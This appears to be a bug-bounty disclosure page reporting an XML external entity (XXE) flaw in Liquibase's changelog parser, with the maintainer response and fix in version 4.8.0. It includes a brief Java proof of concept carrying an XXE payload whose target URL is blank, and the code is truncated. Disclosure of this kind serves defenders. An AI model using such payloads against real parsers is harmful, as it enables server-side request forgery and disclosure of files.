Improper Restriction of XML External Entity Reference in liquibase/liquibase


Reported on

Jan 16th 2022


The XMLChangeLogSAXParser() function makes use of SAXParser generated from a SAXParserFactory with no FEATURE_SECURE_PROCESSING set, allowing for XXE attacks. In

public XMLChangeLogSAXParser() {
        saxParserFactory = SAXParserFactory.newInstance();

Which is used in parseToNode()

            XMLReader xmlReader = parser.getXMLReader();
            xmlReader.parse(new InputSource(new BomAwareInputStream(inputStream)));

Proof of Concept

Extracted out the key function mentioned above to showcase how it can be exploited.

import javax.xml.parsers.SAXParser;
import javax.xml.parsers.SAXParserFactory;
import org.xml.sax.HandlerBase;


public class Poc {

    public static void main(String[] args) {        
        try {
            String xmlpoc = "<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"\">]><foo>&xxe;</foo>";
            SAXParser saxParser = SAXParserFactory.newInstance().newSAXParser();
            saxParser.parse(new ByteArrayInputStream(xmlpoc.getBytes()), new HandlerBase());
        } catch (Exception e) {

Causes an SSRF to


This vulnerability is capable of XXE to disclose data/conduct SSRF attacks etc.

We are processing your report and will contact the liquibase team within 24 hours. 2 years ago
ready-research modified the report
2 years ago
We created a GitHub Issue asking the maintainers to create a 2 years ago
We have contacted a member of the liquibase team and are waiting to hear back 2 years ago
We have sent a follow up to the liquibase team. We will try again in 7 days. 2 years ago
We have sent a second follow up to the liquibase team. We will try again in 10 days. 2 years ago
We have sent a third and final follow up to the liquibase team. This report is now considered stale. 2 years ago
2 years ago


@admin I was asked to mark this as Valid and Confirm Fix. We did release a fix in our last release, but we are not unfortunately in the position right now to pay a bug bounty. I wanted to verify with you all that is okay before I approve and confirm. Thanks for your help!

kataggart validated this vulnerability 2 years ago
ready-research has been awarded the disclosure bounty
The fix bounty is now up for grabs
kataggart marked this as fixed in 4.8.0 with commit 33d9d9 2 years ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
Jamie Slome
2 years ago


@kataggart - we pay for the bounties! We ( sponsor OSS maintainers in fixing vulnerabilities. This support comes directly from our company but also enterprises that depend upon OSS.

So as a maintainer, you won't have to spend a penny to tap into our security community for support + we will even reward you for fixing vulnerabilities. Win-win! 🏆

to join this conversation